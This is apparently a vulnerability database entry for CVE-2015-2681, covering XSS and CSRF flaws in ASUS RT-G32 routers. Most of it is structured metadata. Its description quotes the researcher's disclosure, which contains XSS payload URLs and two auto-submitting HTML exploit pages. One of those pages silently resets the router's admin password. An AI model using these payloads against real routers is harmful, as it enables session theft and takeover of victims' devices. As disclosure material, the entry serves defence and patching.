var-201503-0303
Vulnerability from variot
Multiple cross-site scripting (XSS) vulnerabilities in the ASUS RT-G32 routers with firmware 2.0.2.6 and 2.0.3.2 allow remote attackers to inject arbitrary web script or HTML via the (1) next_page, (2) group_id, (3) action_script, or (4) flag parameter to start_apply.htm. (1) next_page Parameters (2) group_id Parameters (3) action_script Parameters (4) flag Parameters. ASUS RT-G32 is a wireless router product from ASUS. An attacker may exploit these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, perform unauthorized actions, and disclose or modify sensitive information.
Details:
Cross-Site Scripting (WASC-08):
http://site/start_apply.htm?next_page=%27%2balert(document.cookie)%2b%27
http://site/start_apply.htm?group_id=%27%2balert(document.cookie)%2b%27
http://site/start_apply.htm?action_script=%27%2balert%28document.cookie%29%2b%27
http://site/start_apply.htm?flag=%27%2balert%28document.cookie%29%2b%27
These vulnerabilities work as via GET, as via POST (work even without authorization).
ASUS RT-G32 XSS-1.html
ASUS RT-G32 XSS exploit (C) 2015 MustLiveCross-Site Request Forgery (WASC-09):
CSRF vulnerability allows to change different settings, including admin's password. As I showed in this exploit (post-auth).
ASUS RT-G32 CSRF-1.html
ASUS RT-G32 CSRF exploit (C) 2015 MustLiveI found this and other routers since summer to take control over terrorists in Crimea, Donetsk & Lugansks regions of Ukraine. Read about it in the list (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2015-February/009077.html) and in many my interviews (http://www.thedailybeast.com/articles/2015/02/18/ukraine-s-lonely-cyber-warrior.html).
I mentioned about these vulnerabilities at my site (http://websecurity.com.ua/7644/).
Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201503-0303",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "rt-g32",
"scope": "eq",
"trust": 2.5,
"vendor": "asus",
"version": "2.0.2.6"
},
{
"model": "rt-g32",
"scope": "eq",
"trust": 2.5,
"vendor": "asus",
"version": "2.0.3.2"
},
{
"model": "rt-g32",
"scope": null,
"trust": 0.8,
"vendor": "asustek computer",
"version": null
},
{
"model": "rt-g32",
"scope": "eq",
"trust": 0.8,
"vendor": "asustek computer",
"version": "2.0.2.6"
},
{
"model": "rt-g32",
"scope": "eq",
"trust": 0.8,
"vendor": "asustek computer",
"version": "2.0.3.2"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2015-01955"
},
{
"db": "BID",
"id": "73296"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-001914"
},
{
"db": "CNNVD",
"id": "CNNVD-201503-426"
},
{
"db": "NVD",
"id": "CVE-2015-2681"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/h:asus:rt-g32",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:asus:rt-g32_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2015-001914"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "MustLive",
"sources": [
{
"db": "BID",
"id": "73296"
},
{
"db": "PACKETSTORM",
"id": "130724"
}
],
"trust": 0.4
},
"cve": "CVE-2015-2681",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "CVE-2015-2681",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.8,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "CNVD-2015-01955",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "VHN-80642",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:N/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2015-2681",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "CVE-2015-2681",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNVD",
"id": "CNVD-2015-01955",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201503-426",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-80642",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2015-01955"
},
{
"db": "VULHUB",
"id": "VHN-80642"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-001914"
},
{
"db": "CNNVD",
"id": "CNNVD-201503-426"
},
{
"db": "NVD",
"id": "CVE-2015-2681"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Multiple cross-site scripting (XSS) vulnerabilities in the ASUS RT-G32 routers with firmware 2.0.2.6 and 2.0.3.2 allow remote attackers to inject arbitrary web script or HTML via the (1) next_page, (2) group_id, (3) action_script, or (4) flag parameter to start_apply.htm. (1) next_page Parameters (2) group_id Parameters (3) action_script Parameters (4) flag Parameters. ASUS RT-G32 is a wireless router product from ASUS. \nAn attacker may exploit these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, perform unauthorized actions, and disclose or modify sensitive information. \n\n----------\nDetails:\n----------\n\nCross-Site Scripting (WASC-08):\n\nhttp://site/start_apply.htm?next_page=%27%2balert(document.cookie)%2b%27\n\nhttp://site/start_apply.htm?group_id=%27%2balert(document.cookie)%2b%27\n\nhttp://site/start_apply.htm?action_script=%27%2balert%28document.cookie%29%2b%27\n\nhttp://site/start_apply.htm?flag=%27%2balert%28document.cookie%29%2b%27\n\nThese vulnerabilities work as via GET, as via POST (work even without\nauthorization). \n\nASUS RT-G32 XSS-1.html\n\n\u003chtml\u003e\n\u003chead\u003e\n\u003ctitle\u003eASUS RT-G32 XSS exploit (C) 2015 MustLive\u003c/title\u003e\n\u003c/head\u003e\n\u003cbody onLoad=\"document.hack.submit()\"\u003e\n\u003cform name=\"hack\" action=\"http://site/start_apply.htm\" method=\"post\"\u003e\n\u003cinput type=\"hidden\" name=\"next_page\" value=\"\u0027+alert(document.cookie)+\u0027\"\u003e\n\u003cinput type=\"hidden\" name=\"group_id\" value=\"\u0027+alert(document.cookie)+\u0027\"\u003e\n\u003cinput type=\"hidden\" name=\"action_script\"\nvalue=\"\u0027+alert(document.cookie)+\u0027\"\u003e\n\u003cinput type=\"hidden\" name=\"flag\" value=\"\u0027+alert(document.cookie)+\u0027\"\u003e\n\u003c/form\u003e\n\u003c/body\u003e\n\u003c/html\u003e\n\nCross-Site Request Forgery (WASC-09):\n\nCSRF vulnerability allows to change different settings, including admin\u0027s\npassword. As I showed in this exploit (post-auth). \n\nASUS RT-G32 CSRF-1.html\n\n\u003chtml\u003e\n\u003chead\u003e\n\u003ctitle\u003eASUS RT-G32 CSRF exploit (C) 2015 MustLive\u003c/title\u003e\n\u003c/head\u003e\n\u003cbody onLoad=\"document.hack.submit()\"\u003e\n\u003cform name=\"hack\" action=\"http://site/start_apply.htm\" method=\"post\"\u003e\n\u003cinput type=\"hidden\" name=\"http_passwd\" value=\"admin\"\u003e\n\u003cinput type=\"hidden\" name=\"http_passwd2\" value=\"admin\"\u003e\n\u003cinput type=\"hidden\" name=\"v_password2\" value=\"admin\"\u003e\n\u003cinput type=\"hidden\" name=\"action_mode\" value=\"+Apply+\"\u003e\n\u003c/form\u003e\n\u003c/body\u003e\n\u003c/html\u003e\n\nI found this and other routers since summer to take control over terrorists\nin Crimea, Donetsk \u0026 Lugansks regions of Ukraine. Read about it in the list\n(http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2015-February/009077.html)\nand in many my interviews\n(http://www.thedailybeast.com/articles/2015/02/18/ukraine-s-lonely-cyber-warrior.html). \n\nI mentioned about these vulnerabilities at my site\n(http://websecurity.com.ua/7644/). \n\nBest wishes \u0026 regards,\nMustLive\nAdministrator of Websecurity web site\nhttp://websecurity.com.ua \n",
"sources": [
{
"db": "NVD",
"id": "CVE-2015-2681"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-001914"
},
{
"db": "CNVD",
"id": "CNVD-2015-01955"
},
{
"db": "BID",
"id": "73296"
},
{
"db": "VULHUB",
"id": "VHN-80642"
},
{
"db": "PACKETSTORM",
"id": "130724"
}
],
"trust": 2.61
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2015-2681",
"trust": 3.4
},
{
"db": "PACKETSTORM",
"id": "130724",
"trust": 3.2
},
{
"db": "BID",
"id": "73296",
"trust": 1.4
},
{
"db": "JVNDB",
"id": "JVNDB-2015-001914",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201503-426",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2015-01955",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-80642",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2015-01955"
},
{
"db": "VULHUB",
"id": "VHN-80642"
},
{
"db": "BID",
"id": "73296"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-001914"
},
{
"db": "PACKETSTORM",
"id": "130724"
},
{
"db": "CNNVD",
"id": "CNNVD-201503-426"
},
{
"db": "NVD",
"id": "CVE-2015-2681"
}
]
},
"id": "VAR-201503-0303",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2015-01955"
},
{
"db": "VULHUB",
"id": "VHN-80642"
}
],
"trust": 1.12424244
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2015-01955"
}
]
},
"last_update_date": "2024-11-23T21:44:25.751000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "RT-G32",
"trust": 0.8,
"url": "http://www.asus.com/Networking/RTG32/"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2015-001914"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-79",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-80642"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-001914"
},
{
"db": "NVD",
"id": "CVE-2015-2681"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.1,
"url": "http://websecurity.com.ua/7644/"
},
{
"trust": 3.1,
"url": "http://packetstormsecurity.com/files/130724/asus-rt-g32-cross-site-request-forgery-cross-site-scripting.html"
},
{
"trust": 2.3,
"url": "http://seclists.org/fulldisclosure/2015/mar/42"
},
{
"trust": 1.1,
"url": "http://www.securityfocus.com/bid/73296"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-2681"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2015-2681"
},
{
"trust": 0.3,
"url": "http://www.asus.com/"
},
{
"trust": 0.3,
"url": "http://www.asus.com/networking/rtg32/"
},
{
"trust": 0.1,
"url": "http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2015-february/009077.html)"
},
{
"trust": 0.1,
"url": "http://websecurity.com.ua"
},
{
"trust": 0.1,
"url": "http://site/start_apply.htm?next_page=%27%2balert(document.cookie)%2b%27"
},
{
"trust": 0.1,
"url": "http://websecurity.com.ua/7644/)."
},
{
"trust": 0.1,
"url": "http://site/start_apply.htm?flag=%27%2balert%28document.cookie%29%2b%27"
},
{
"trust": 0.1,
"url": "http://www.thedailybeast.com/articles/2015/02/18/ukraine-s-lonely-cyber-warrior.html)."
},
{
"trust": 0.1,
"url": "http://site/start_apply.htm?action_script=%27%2balert%28document.cookie%29%2b%27"
},
{
"trust": 0.1,
"url": "http://site/start_apply.htm?group_id=%27%2balert(document.cookie)%2b%27"
},
{
"trust": 0.1,
"url": "http://site/start_apply.htm\""
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2015-01955"
},
{
"db": "VULHUB",
"id": "VHN-80642"
},
{
"db": "BID",
"id": "73296"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-001914"
},
{
"db": "PACKETSTORM",
"id": "130724"
},
{
"db": "CNNVD",
"id": "CNNVD-201503-426"
},
{
"db": "NVD",
"id": "CVE-2015-2681"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2015-01955"
},
{
"db": "VULHUB",
"id": "VHN-80642"
},
{
"db": "BID",
"id": "73296"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-001914"
},
{
"db": "PACKETSTORM",
"id": "130724"
},
{
"db": "CNNVD",
"id": "CNNVD-201503-426"
},
{
"db": "NVD",
"id": "CVE-2015-2681"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2015-03-25T00:00:00",
"db": "CNVD",
"id": "CNVD-2015-01955"
},
{
"date": "2015-03-23T00:00:00",
"db": "VULHUB",
"id": "VHN-80642"
},
{
"date": "2015-03-24T00:00:00",
"db": "BID",
"id": "73296"
},
{
"date": "2015-03-25T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2015-001914"
},
{
"date": "2015-03-07T11:11:11",
"db": "PACKETSTORM",
"id": "130724"
},
{
"date": "2015-03-24T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201503-426"
},
{
"date": "2015-03-23T16:59:09.523000",
"db": "NVD",
"id": "CVE-2015-2681"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2015-03-25T00:00:00",
"db": "CNVD",
"id": "CNVD-2015-01955"
},
{
"date": "2016-12-03T00:00:00",
"db": "VULHUB",
"id": "VHN-80642"
},
{
"date": "2015-03-24T00:00:00",
"db": "BID",
"id": "73296"
},
{
"date": "2015-03-25T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2015-001914"
},
{
"date": "2015-03-24T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201503-426"
},
{
"date": "2024-11-21T02:27:50.530000",
"db": "NVD",
"id": "CVE-2015-2681"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201503-426"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Asus RT-G32 Router Cross-Site Scripting Vulnerability",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2015-01955"
},
{
"db": "CNNVD",
"id": "CNNVD-201503-426"
}
],
"trust": 1.2
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "XSS",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201503-426"
}
],
"trust": 0.6
}
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.